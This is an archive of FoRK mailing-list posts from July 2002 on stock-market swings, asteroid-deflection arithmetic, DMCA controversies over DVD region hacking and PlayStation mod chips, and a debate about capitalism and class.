behind the curtain, right? :-).- --- begin forwarded text
From: Somebody Else
To: "R. A. Hettinga" 
Subject: Re: It's back? Triple-digit Dow gains at 2PM...
Date: Wed, 24 Jul 2002 21:44:19 -0600Bob,So.  Let's see.  The market's all the way back up to... what? Last
Friday's
close?Iiiiirrraaational iinnndeed.
- ----- Original Message -----
From: "R. A. Hettinga" 
To: "Digital Bearer Settlement List" 
Sent: Wednesday, July 24, 2002 2:02 PM
Subject: RE: It's back? Triple-digit Dow gains at 2PM...
&gt; At 2:55 PM -0400 on 7/24/02, Somebody wrote:
&gt;
&gt;
&gt; &gt; The market doesn't close for two hours.
&gt;
&gt; The market just closed. Up 496.63, 6.45%, at 8198.9697.
&gt;
&gt; :-).
&gt;
&gt; You never catch the upticks if you don't stay in the market...
&gt;
&gt; Cheers,
&gt; RAH
&gt;
&gt; --
&gt; -----------------
&gt; R. A. Hettinga 
&gt; The Internet Bearer Underwriting Corporation 
&gt; 44 Farquhar Street, Boston, MA 02131 USA
&gt; "... however it may deserve respect for its usefulness and
&gt; antiquity, [predicting the end of the world] has not been found
&gt; agreeable to
&gt; experience." -- Edward Gibbon, 'Decline and Fall of the Roman
&gt; Empire'
&gt;- --- end forwarded text
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.5iQA/AwUBPT+eg8PxH8jf3ohaEQJaJACferw1H2dZWXUEkFKdJ3bVpSJ5QnQAoPoD
+oIb0wFbSjKC4hdc/DSjPkvj
=pRCH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</si>
  <si>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Eugen Leitl writes:
&gt; Apart from twiddling with the surface albedo which might be not
&gt; enough -- we currently don't have ion drives with enough power, or at
&gt; least we can't develop and deploy them on time, My estimate is that, in the worst case, we have 17 years (5.4e8
seconds) to move it one earth radius, or about 6000 km (6e6 m).  
a t^2/2 = x, if I remember right, so a = 2x/t^2, which is 
1.2e7 m/(2.9e17 s^2), or about 4.1e-11 m/s^2, which is not a very
large acceleration, roughly equivalent to the gravitational
acceleration in these parts divided by 200000000000.  Assuming a
2km-wide --- that is, 20 000 decimeter-wide --- spherical asteroid of
specific gravity 10, 4/3 pi r^3 says it would have a volume of 4e12
cubic decimeters and thus a mass of 4e13 kg.  The force we'd have to
apply to achieve this acceleration would be roughly equivalent to the
weight of 200 kg here on Earth.So, yeah, ion drives are probably a no-go, unless I screwed up the
calculations here; I think the force they typically exert is about
four orders of magnitude too small.If we just wanted to hit today it with enough of an impulse that it
would miss us 17 years later, we'd need to accelerate it by about 1.1
cm/s.  A one-ton (1000kg) mass would need to hit it at about 4e9 m/s,
or about ten times the speed of light, to achieve this, so that's not
possible.  (If you could actually put enough work into a one-ton mass,
as it approached the speed of light, it would mass more, so you could
still do it with a one-ton mass; but we don't have anything
approaching that speed.)  The impulse required is inversely
proportional to the remaining time to impact, so if we were to hit it
after half the time has elapsed, we'd need to accelerate it by around
2.2 cm/s instead.The gravitational force of an Earth-sized mass could provide
sufficient deflection if that mass were about 4.5e5 times as far away
from the asteroid as we are from Earth's center, or about 2.7e9 m, or
about 0.018 times the distance from the Earth to the Sun (0.018 AU).
(And if that mass stayed so nearby for 17 years.)The effects of continuous acceleration benefit greatly from planning
ahead, since they scale with t^2, not t --- and thus the needed
acceleration scales with 1/t^2.  After half the time has elapsed, we'd
need four times as much acceleration to make it miss the Earth than if
we were to start accelerating it now.All of these numbers are a little low, because the Earth presents a
slightly easier target than its physical size suggests, due to its
gravity well.  How much easier depends on the speed of the projectile
in ways I don't understand.They're also a little high, because they assume the force is being
applied purely at right angles to the asteroid's current path, which
is a slightly suboptimal scenario (although for velocity changes five
orders of magnitude smaller than the relative velocity, the difference
is probably insignificant.)  And they assume there are no other effects on the asteroid's path.What about electrical charges?  Could we electrically charge the
asteroid and another nearby asteroid, perhaps with electron beams, to
provide the needed acceleration?Of course, all of this calculation could be applied in the other
direction, too.  If you want to sock a moon colony with a one-ton
asteroid, you could do it with a tiny amount of force applied over
twenty-five years to adjust its orbit.***About spam: I'm sorry to admit I haven't implemented any of the better
solutions, and so I'm afraid I'll have to allow non-subscriber FoRK
mail to be detained for scanning.  I hope this measure can be reversed
soon when I have time to implement better measures.  As has often been
noted by other posters, measures to reduce spam sent to the FoRK list
will not significantly decrease the spam load of FoRKposters, since
the vast majority of spam received by FoRKposters is sent to them
directly, not through the FoRK list.-- 
       Kragen Sitaker     
Silence may not be golden, but at least it's quiet.  Don't speak unless you
can improve the silence.  I have often regretted my speech, never my silence.
-- ancient philosopher Syrus (?) via Adam Rifkin, 
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 25 Jul 2002, R. A. Hettinga wrote:&gt; So, in light of the erstwhile bloodbath on Capital Hill, and the real
&gt; one we just saw a few days ago in the market, it may be time for
&gt; people to remember what Mr. Rothschild said, and buy now while
&gt; there's blood in the streets.Luckily, I'm in no such predilection as technolumpen.However, the signs do seem to head for a much deeper crapper than the one
we're currently in, and this has relevance to those switching jobs, or
those just entering the job market. Nano/bio startups are all screwed up,
alas. It's too early to wait for the radioactive glass to cool down while
the nukes are still going off, imo.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Remember when I said that taking an afternoon off to march for Dmitri
was pissing in the wind and that to be really effective we needed
people willing to publically break the stupid laws right in the
face of the authorities?Well it seems Bruce Perens agrees with me, only he's going one better,
instead of just mouthing off about it, he's going to do it and do it 
in a big way ...
    Open source campaigner to risk jail
    By James Middleton [24-07-2002]    Bruce Perens plans live DVD hack    With the dust from the Elcomsoft/Sklyarov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$500,000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2001 Perens made a presentation on the
    triviality of Digital Rights Management systems using exactly the
    same slides that got Sklyarov arrested.http://www.vnunet.com/News/1133862-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; (or who are offspring of Wilt)My bad.  Wilt, even if he had media
exposure that major studs only dream
about, was just another example of
natural selection, and doesn't even
come close to livestock potency.1) I rather doubt that most of his
20,000 women bothered to check the
rebounding records of his cousins
and uncles and whatnot (how old is
basketball, in generations?) and
compared them with their own kin's.2) Let's give Mr. Chamberlain the
benefit of the doubt and suppose he
sired twins with each mate.  40,000
lifetime production compares poorly
with a holstein bull.-Dave&gt; Teat size and placement are always ideal which suggests that INCOME
&gt; daughters are the perfect kind for robot milkers.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 24 Jul 2002, Tom wrote:&gt; "Around the world, there is a growing sense that democracy has not
&gt; delivered development" Sakiko Fukuda-Parr UN report authorOr perhaps it is the unregulated and out of control capitalism used as a
tool to concentrate wealth and form a greed-based society?I notice the top 5 have a good amount of socialism in their systems to
regulate the capitalism, especially in things like health care and
education.Just look at our health care - no insurance = no care. Or education - gimme
my voucher so I can get my kids out of the system while their IQ is still
over 20.South American countries are currently figuring out just where this
greed-based system ends up, and are looking for a way out.It was a fun ride tho wasnt it?- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Cheers, Adam.Perhaps people are starting to notice how profit motive drains the 
meaning out of their lives. Kinda sucks to be an ant farming for the 
corporate lords. Funny how most of the rest of the world is more and 
more apprehensive towards American Democracy.I just went to DC for the first time. I was awestruck by the 
monuments, the words of Thomas Jefferson, the Spirit of Democracy set 
in stone. Amazing to think that in little more than 200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co-opt and commodify? Get your 
copyrights in quick so you can hold on to your piece of the pie. 
Health care, public programs, pensions, social security - these are 
now regarded as worthless unless they can turn a profit.Ah, socialized medicine. Siestas. 6 week vacation leave. I hear Spain 
is nice this time of year...At 2:35 PM -0700 7/25/02, Adam L. Beberg wrote:
&gt;On Wed, 24 Jul 2002, Tom wrote:
&gt;
&gt;&gt;  "Around the world, there is a growing sense that democracy has not
&gt;&gt;  delivered development" Sakiko Fukuda-Parr UN report author
&gt;
&gt;Or perhaps it is the unregulated and out of control capitalism used as a
&gt;tool to concentrate wealth and form a greed-based society?
&gt;
&gt;I notice the top 5 have a good amount of socialism in their systems to
&gt;regulate the capitalism, especially in things like health care and
&gt;education.
&gt;
&gt;Just look at our health care - no insurance = no care. Or education - gimme
&gt;my voucher so I can get my kids out of the system while their IQ is still
&gt;over 20.
&gt;
&gt;South American countries are currently figuring out just where this
&gt;greed-based system ends up, and are looking for a way out.
&gt;
&gt;It was a fun ride tho wasnt it?
&gt;
&gt;- Adam L. "Duncan" Beberg
&gt;   http://www.mithral.com/~beberg/
&gt;   beberg@mithral.com
&gt;
&gt;
&gt;http://xent.com/mailman/listinfo/forkhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">chris arkenberg wrote:
&gt; Cheers, Adam.
&gt; 
&gt; Perhaps people are starting to notice how profit motive drains the 
&gt; meaning out of their lives.And, having realized that, a lot of them are now having babies.
I can't believe the number of friends at work who are now pregnant
or have already just had their babies.- JoeP.S. Who said that the US was required to be number 1
at all times??? What's so bad about 6?-- 
Left behind the bars
Rows of Bishops' heads in jars
And a bomb inside a car
Spectacular, spectacular
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;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babies..boom?- Jim
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Has anyone considered the fact that these occurrances appear to
be increasing. I'm aware that maybe more publicity surrounding
some and certain agencies have been granted more funding, but 
I'd like to see some data which shows if these are increasing
or not. Why? Well, it seems to me if we were going to get hit, the one
that does it may have been part of a larger swarm or cluster
which has over the years increased the distance between the
rocks. Like the Schumaker Levy-9, which had multiple rocks
all impacting at different times, others may have this same
type of design and could be in different stages of increasing
distance from one another. Also to consider is if SL-9 was
on course for earth, would we get hit by all rocks or only
one because the earth is a much smaller target than Jupiter?So, my theory is that if these near earth rocks are increasing
so does our chance of discovering the last three were part of
a swarm of 15 of which 10, 11 and 12 may hit.On 24-Jul-2002,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&gt; -c
&gt; 
&gt; &gt;
&gt; &gt; --
&gt; &gt; Gary Lawrence Murphy  TeleDynamics Communications
&gt; &gt; Inc Business Innovations Through Open Source Systems:
&gt; &gt; http://www.teledyn.com "Computers are useless.  They can only give you
&gt; &gt; answers."(Pablo Picasso)
&gt; &gt;
&gt; &gt; http://xent.com/mailman/listinfo/fork
&gt; 
&gt; 
&gt; 
&gt; http://xent.com/mailman/listinfo/fork
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 25 Jul 2002, Joseph S. Barrera III wrote:--]And, having realized that, a lot of them are now having babies.
--]I can't believe the number of friends at work who are now pregnant
--]or have already just had their babies.We hope that in the next generation we can bring back what we once thought
of as our future, or more aptly thier future will be a shade better than
what ours is turning out to be.I cant help but appologise to my wifes bulging middle in these last few
dyas of the pregancy. I wanted so much more for him. My daughter and I
talk about this in the ways an 8 year old can with a 39 year old. She
realizes things are not all they could have been, but shes sort of ready
for the challange. She told me the other day she would get to the moon if
I dont. Gota love kids, they say the coolest things at just the right
times.As for profit and the drive towars it...moeny is simply a tool,simply one
way of many to facilitate living the life you want. Too many have taken
the tool for the goal, the race for the prize and the notion that first is
all.Yea yea, this sad burlesque.-tomhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
"Yes,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ho."Kurt V
Slapstick
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Tom wrote:
&gt;     Eliza and I, thinking as halves of a single genius, proposed that the
&gt; Constitution be amended so as to guarantee that every citizen, no matter
&gt; how humble or crazy or incompetent or deformed, somehow be given
&gt; membership in some family as covertly xenophobic and crafty as the one
&gt; their public servants formed.That was Such a Fucking Depressing Book.
I must have read it seven or eight times.- Joe Daisy-38 Barrera.
-- 
Left behind the bars
Rows of Bishops' heads in jars
And a bomb inside a car
Spectacular, spectacular
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == Jon O  writes:    J&gt; So, my theory is that if these near earth rocks are increasing
    J&gt; so does our chance of discovering the last three were part of a
    J&gt; swarm of 15 of which 10, 11 and 12 may hit.To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it's solar perigee.  Space
in that neighbourhood is warped like a cheese-grater.  We can expect
one (or more) really big mother(s), surrounded by lots of cute little
'uns smeared out in the crest of its gravity wave.Another curious artifact of the old-and-periodic rock data is the
bigger rocks are on the outer edge of the tubes: Relativistic effects
on the redshift/blueshift of the particle solar heating differential
on either side of each bit slow the smaller less-massive (and more
easily pushed) particles dropping them into lower orbits ... or at
least, that's our best theory.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == Jon O  writes:    J&gt; Has anyone considered the fact that these occurrances appear to
    J&gt; be increasing. I'm aware that maybe more publicity surrounding
    J&gt; some and certain agencies have been granted more funding, but
    J&gt; I'd like to see some data which shows if these are increasing
    J&gt; or not.I've seen data that shows 1200 rocks (TV-set sized and smaller)
crashing into the Ottawa skies /every/ /single/ /night/, and that's
just the background noise.  Plots of that data show us passing through
hundreds of 'tubes' of debris, each indicative of some other larger
something out there, only a small handful of which have been
discovered.  This is without even considering the one's headed this
way out of the Oort for their First Big Trip.One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co-ordinating multiple telescopes to detect these
criters, one of which plans to network dozens of ground based machines
around the world.  You may remember a few years back the 2028 doomsday
story -- consider them good ghost stories, then go back to work.20,000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90-min advance warning.   The near-miss earlier this month wasn't seen until it was already past
us; we can't detect rocks on their trip behind the Sun, and when they
come out slingshot to relativistic speeds, well, it's just too darn
late to do much of anything about it.  On the inbound trip, even at
their max full-moon angle, these things are most often magnitude 16 or
way worse, which is many magnitudes fainter than what you see in the
deepest dark-skies; no one thought to paint them shiny and white.
They day before it "hits" my software says NT7 will be magnitude 14 --
it's easier to see the space station.What's worse, the Sun is not a smooth hard spheric marble, it's a
twisted gelatinous hunk o' hunk o' burnin' love, so the precise warp
curve of space right near it's backside is (ahem) somewhat problematic
to compute precisely.  It's also spewing considerable plasma flux in
all directions, and then there's all these other big gelatinous roaming
globs (Saturn, Jupiter, Uranus, Neptune) and some significant roaming
rubble (us), and damn it, they are all spinning too, and most of them
have a magnetosphere!Shit. Forget it.Learn to play the banjo. Take peppermint Rye-Kee Shee-At-Zoo relaxation
therapy and oodles of Ag-nasial I&amp;I-drop suppliments, eat no kind of
frozen portion, and floss.  Good planets are real hard to find, so
enjoy the one you got while it's here.  Call your ma. Do an anonymous
kindness for your better half, another for a total stranger. Having
all the best toys is useless when they all spontaneously combust from
a global Wormwood shockwave. You should be diggin' it while it's
happenin'Like, just live your life like there's no tomorrow, ok?  Don't bank on
being able to redeem yourself later. Yeah, sure, Osama could whack you
with some nail-coated fuel-air bombs, heck a mis-informed TopGun could
do it too, but the Good Lord could do it too, with pure, clean and
galactically EnviroFriendly kinetic energy, and He don't stand in line
for no Airport Security Check. Hell, fire and brimstone are
classically given in the reverse order; best to be on the impact side
of the planet.Learn to stop worrying and love the Rock.  Besides, the rats and
cockroaches will survive, and they already know how to kickstart
evolution right back into Enrons, WorldComs and Calcuttas.  They even
have all our wiring and plumbing diagrams and half of our socks.Are we going to get hit?  Yup.  When?  Every 65 million years and, oh my lord, will you /look/ at the time!Where/what/when? Space is pretty big.  Take the largest thing you can
imagine, double it, and add 10%: That is just the local pancake region
between us and the Sun. There's the whole rest of the disk of the
ecliptic and, which is where the NT7 observation came from, it has
only recently occurred to the meteor hunters to "look up" (or down);
almost the first shot looking /out/ of the ecliptic disk, and hoo-whee
there's this big sucker on an "11 tries for a dollar" close encounter
of the smack-em-good kind.This is what I love about astrophysics: we have theories as good as
anyone else (way better than psychology), and we debate and argue and
expound and conference and bellow and blurt about them, but every time
we turn on some new kind of robot sensor device to actually /look/ at
Reality, well she slaps us right in the face and says in her best Mae
West "Guess again, boys" -- no other science gets that chance (ok,
maybe some do) and there is nothing, _nothing_ more worthless than last
semester's astronomy text.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>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day.Do you have any further information about this incident that
would me find more details on the web?- Gordon
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 25 Jul 2002, Joseph S. Barrera III wrote:&gt;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babies.The 9/11 boom is now well underway. Screaming newborns everywhere...- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.comhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 25 Jul 2002, chris arkenberg wrote:&gt; Perhaps people are starting to notice how profit motive drains the
&gt; meaning out of their lives. Kinda sucks to be an ant farming for the
&gt; corporate lords. Funny how most of the rest of the world is more and
&gt; more apprehensive towards American Democracy.Drains what? My wallet you mean? America _is_ greed, that's who and what we
are.&gt; I just went to DC for the first time. I was awestruck by the
&gt; monuments, the words of Thomas Jefferson, the Spirit of Democracy set
&gt; in stone. Amazing to think that in little more than 200 years our
&gt; government could be so far removed from those honorable principles.
&gt; Adam Smith presumed that the marketplace would regulate itself
&gt; through morality, good faith, and responsibility.Those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100 billion and all the rest have
too dolla a day.Having been raised in a generally ethical way, it was a big jump to learn to
run a business. Lots of lessions in being ruthless, and a few about being
sure to hire large Italians to do debt collection (it works!).&gt; Corporate America seems to feel that those principles stand in the way
&gt; of making the real bucks.No shit, really? Seriously, if you're not all about screwing over the
customer, there is no place for you in the ruling class, and you certainly
cant play the American game.&gt; Ah, socialized medicine. Siestas. 6 week vacation leave. I hear Spain is
&gt; nice this time of year...That's living, here we only work, buy, and work more to buy more, like rats
on a wheel. I can't wait to be rich enough to move somewhere nice, if they
will let me get out alive that is.- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.comhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "G" == Gordon Mohr  writes:    G&gt; Gary Lawrence Murphy writes:
    &gt;&gt; 20,000 years ago, one of them the size of Mt Everest just ever
    &gt;&gt; so slightly grazed us and left a scar 400km long in the side of
    &gt;&gt; South America    G&gt; Do you have any further information about this incident that
    G&gt; would me find more details on the web?Good question.  This was covered in one of the amateur rags, maybe Sky
and Telescope or even Scienterrific American, long before there was any
web to speak of, but you'd think a 400km gash in the Earth would be
pretty easy to find ;) I remember it from an issue perhaps in the very
late 80's or early 90's.It's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70 years, but not the 400km gash from the above story.  The only google refs I found from that period is one in Arizona
(famous impact crater) and another in NM; do wish I had noted the
actual South American /country/ that contains the scar; Venezuela
sticks in my mind but I can't be certain.  http://neo.jpl.nasa.gov/images/meteorcrater.html-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 25 Jul 2002, Jon O. wrote: 
&gt; Has anyone considered the fact that these occurrances appear to
&gt; be increasing. I'm aware that maybe more publicity surroundingNo, it's just we've started looking. After we've actually started looking 
for deep infrasound (pressure waves) with a network of stations designed 
to enforced the nuke test ban treaty we've discovered that pretty big 
impacts are the norm. Current infrasound stations can detect 
bolides/meteoroids in ~10 T TNT scale, but some 10 kT events are 
relatively frequent. A number of people died in the Tunguska event (1908, 
10-15 MT), despite it hitting in the middle of nowhere.http://216.239.39.100/search?q=cache:637JrhGDB5gC:www.lpi.usra.edu/meetings/5thMars99/pdf/6081.pdf+bolide+impact+kT+wave&amp;hl=en&amp;ie=UTF-8In the Earth atmosphere a large number of bright light flashes of energies
in light impulse of about 0.1- 1 kt TNT and higher have been registered by
USA DoD satellites equipped with photoelectric detectors [9-11]. Intense
light impulses are created by impacts of meteoroids disrupted in the
atmosphere (mainly at altitudes of about 30-45 km). Several techniques for
the assessment of meteor- oid's characteristics from the light curves and
heights of peak intensities have been developed [3,12]. Using these
techniques the preatmospheric kinetic energy for Fifth International
Conference on Mars INITIATION OF SANDSTORMS: I.V.Nemtchinov, O.P.Popova,
V.A.Rybakov, V.V.Shuvalov a number of events was determined. The biggest
event is the 1 February 1994 with ini- tial energy as high as 30-40 kt TNT
(or initial mass of about 400 t). The bright flash with light energy of
about 4.5 kt TNT was caused by this meteoroid which deeply penetrated into
the atmosphere (at an angle of 45 degrees and velocity of 24 km/s) and
disintegrated above at altitudes of about 34 km and 21 km [9,12]. Another
famous impact event, the Sikhote-Alin meteor shower (12 February 1947
event), may be compared with the 1 February 1994 event. Initial masses of
these meteoroids are probably the same, as well as the angle of trajectory
inclination, but the initial velocity of the Sikhote-Alin is almost twice
smaller. That caused fragmentation of 1 February 1994 meteoroid at higher
altitudes and probably large fragments constitute a smaller part of the
pre- breakdown mass in contrast to the Sikhote-Alin event. In a rarefied
atmosphere of Mars analogous im- pactors will penetrate into deeper layers
of the atmos- phere.They will disintegrate lower 15 km or even reach the
planet surface, partially in disrupted form. Only the first disruption
would occur if a meteoroid similar to that caused the 1 February 1994 will
enter into the Martian atmosphere. And this body would reach the Mars
surface as a tense swarm of fragments. The meteoroid similar to that
caused the Sikhote-Alin event would hit the surface in a form of large
frag- ments due to its low velocity. They will create crater with the size
similar to that of the undisrupted meteoroid.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.abc.net.au/news/justin/weekly/newsnat-26jul2002-53.htmPlayStation owners win copyright caseOwners of PlayStation consoles who modify their machines to play games
bought overseas have had a win in the Federal Court.Sony Computer Entertainment has failed in its claim that "chipping" breaks
copyright laws.Sony launched legal proceedings against a Sydney man, Eddy Stevens, for
allegedly selling pirated games and also providing and installing
modification chips.PlayStation consoles in Australia are different from those in the US and
Japan because of the different television formats.The court was told "chipping" allows people to play legitimately bought
overseas games and copies of games, but also pirated games.The judgement by Federal Court Justice Ronald Sackville says Sony failed
to prove that PlayStation consoles have a copyright protection measure
installed in the first place and therefore could not rule that a mod chip
breaks copyright legislation.Mr Stevens was found to have infringed trademark rules in relation to the
pirated games he sold a matter which will come before the court again next
month.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.siliconvalley.com/mld/siliconvalley/business/columnists/dan_gillmor/ejournal/3735855.htm
Posted on Thu, Jul. 25, 2002Copyright Law Thwarts Open Source Confab Demo
Posted by Dan Gillmor
Bruce Perens was going to demonstrate a modified DVD player at this week's
Open Source gathering in San Diego. He'd planned to show (Infoworld) how a
DVD player with its regional coding disabled could play DVDs with
different regional codes.Perens was going to do this in violation, he believed, of the Digital
Millennium Copyright Act, which bans the circumvention of technological
methods to protect copyrighted material from uses the owner doesn't want.
And the possibility of legal trouble led his employer, Hewlett-Packard, to
ask him not to do the demonstration.HP funds Perens to pursue a variety of free software projects. He was
willing to take the legal risks himself, he told me today, but HP worried
that it would be "a more juicy target," the kind of deep pockets that
might make the entertainment cartel drool. In that context it's
understandable why HP would be concerned, though I wish the company would
take a stand on the right side of this issue.So while Perens is going to talk about the DMCA's pernicious impact on
things like free software, he's not going to give his demonstration. A
shame, but that's how things are going these days.Hollywood is winning, folks. You are losing. And you'd better start caringhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Friday, July 26, 2002, at 05:18 AM, Owen Byrne wrote:
&gt; employees, and that an awful lot of
&gt; corporations have shown that they can't keep track of billions 
&gt; upon billions of dollars.I think we need to get away from rhetoric that implies that the 
billions of dollars in hard cash, revenues, and capitalization was 
"lost" somehow.The ruling class, whether you define them as government or business 
(what's the difference?) knows full well where that money is.  It's 
lining their pockets, buying their hobby ranches, and financing 
their private jets.Neither has any interest in the welfare of the working class.Of course, none of this is new bits.-Ian.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Eric tells me the site is back up, debugged, and ready for comments;
it's a first-hand guided tour of McLuhanism and the Internet, from
tetrads to teleconferencing.http://home.istar.ca/~jwaddell/McLuhan/-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 2002-07-26 at 11:50, Ian Andrew Bell wrote:
&gt; The ruling class, whether you define them as government or business 
&gt; (what's the difference?) knows full well where that money is.  It's 
&gt; lining their pockets, buying their hobby ranches, and financing 
&gt; their private jets.
&gt; 
&gt;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can't even manage that.That is really what it all boils down to:  There are lots of ignorant
and/or stupid people who are quite happy to stay that way, and it is a
key causal factor in why things are the way they are.  What are you
going to do about it?
-James Rogers
 jamesr@best.comhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Soros, in _Open Society_, says he
has a theory that the coevolutionary
nature of finance and history mean
they are subject to many boom-bust
cycles.  As a result of having some
leisure time after playing them so
successfully with Quantum Fund, he
now believes that we need to keep
our strategies as game players and
rule makers distinct: the ends of
rule makers can't be so strictly
personal as those of game players.Do the cardinal virtues provide a
set of restoring forces which allow
one to act in balance?temperance  - avoid hubris in booms
fortitutude - avoid depression in busts
prudence    - maximize personal utility (as a game player)
justice     - maximize common good (as a rule maker)-Davehttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Friday, July 26, 2002, at 12:19 PM, James Rogers wrote:&gt; On Fri, 2002-07-26 at 11:50, Ian Andrew Bell wrote:
&gt;&gt; The ruling class, whether you define them as government or business
&gt;&gt; (what's the difference?) knows full well where that money is.  It's
&gt;&gt; lining their pockets, buying their hobby ranches, and financing
&gt;&gt; their private jets.
&gt;&gt;
&gt;&gt; Neither has any interest in the welfare of the working class.
&gt;
&gt; Yes, and the working class deserves what it gets, and possibly not even
&gt; that.  For the most part, people become wealthy by not being stupid.  I
&gt; always thought "not being stupid (most of the time)" was a fairly low
&gt; bar, but apparently most people can't even manage that.This isn't particularly well-founded logic.  What you're saying is 
that "most rich people are smart" and that the latter is causal to 
the former.  By implication, then, you would say that "most poor 
people are stupid".  This is true, statistically, because most 
people are poor and most people are also stupid.  However there's 
nothing to indicate a causal link there.  So being smart isn't the 
only mechanical requirement to eternal wealth because, obviously, 
most of the members of this list would be rich.Being smart, for example, has made Stephen Hawking famous and 
respected, but he's not particularly rich.  Jennifer Lopez is by 
all accounts a complete moron.  In fact, spend a weekend in Beverly 
Hills and you will encounter vast numbers of people who are 
profoundly stupid driving Rolls Royces and shopping at PRADA.The working class IS the market and the working class IS where 
wealth is created.  The working class makes long-distance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funnel.The economic system of the first world is designed to strike a 
delicate balance between incentivizing the ruling class to support 
wealth-expanding through technological innovation or the 
development of new markets.  At the 100,000 foot level, recessions 
and depressions are created when more wealth is sucked from the 
whirlpool than can be supported by the working class through 
investment and consumption.And the people draining the hot tub are the folks in the ruling 
class -- people like Ken Lay, Dick Cheney, Bernie Ebbers, et al -- 
and they simply got too greedy and caused a bubble in the 
hydraulics that increased the pressure for a time, but ultimately 
wasn't sustainable.And the money that was lost did not come from the ruling class.  It 
came from the RSP's and the Equity funds and the Investments of 
individual working class -- people who believed these reports and 
invested.  The wealth of the ruling class was largely pulled out by 
the time such investments were exposed to the workers.So, is the lower caste necessarily stupid for saving money or 
investing in retirement plans?  I don't think so.  Are they stupid 
for buying clothes and automobiles?  I don't think so.At the granular level, the notion that "most rich people are rich 
because they're smart" is so anecdotal and naive that it's not 
worth arguing about, so I won't.  Still, a compelling point worth 
some clarification.-Ian.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 26 Jul 2002, Ian Andrew Bell wrote:--]Being smart, for example, has made Stephen Hawking famous and
--]respected, but he's not particularly rich.Bang, you fell right into the trap of Sematic Siezerdom.RICH is a word of many contexts. You can be RICh in wealth, ie raw money,
you can be Rich in Wisdom, ala Hawkins, You can be rich with freinds, you
can be Rich in emotions........--]all accounts a complete moron.  In fact, spend a weekend in Beverly
--]Hills and you will encounter vast numbers of people who are
--]profoundly stupid driving Rolls Royces and shopping at PRADA.MOney Rich versus Mental Rich....Equality amongst differnt grains...Why do
folks still fall into this trap?--]The working class IS the market and the working class IS where
--]wealth is created.In the current ecomony Wealth is created only in TRANPORT of wealth, that
is in moving the micro welath of the masses to to macro wealth of the few.100 million people making phone calls a day that net you 1$ per call makes
you a 100millionaire per day (minus operating expenses (real costs of
physical value as well as the less physical value of lubricant (taxes,
bribes, payoffs, kickbacks)etc)--]And the people draining the hot tub are the folks in the ruling
--]class -- people like Ken Lay, Dick Cheney, Bernie Ebbers, et al --They were put into the rulign cvlass by the mass consess that THEY are
amrt fellas who can make us feel good about giveing them the power to tell
us how to live our lives (and thus how to feel about ourselves,how to
value our worth, how to feel good about being etc etc etc)--]So, is the lower caste necessarily stupid for saving money or
--]investing in retirement plans?  I don't think so.  Are they stupid
--]for buying clothes and automobiles?  I don't think so.They are STUPID in allowing, heck forcing, the few to stand guard over the
many and then pay for the service of being servants to them.--]At the granular level, the notion that "most rich people are rich
--]because they're smart" is so anecdotal and naive that it's not
--]worth arguing about, so I won't.  Still, a compelling point worth
--]some clarification.
At the grainular level it is simply that Those who can con enough folks
into giving up thier Choices to a governing body (usualy one they will
control) wind up with the most concentration of Wealth (money) and
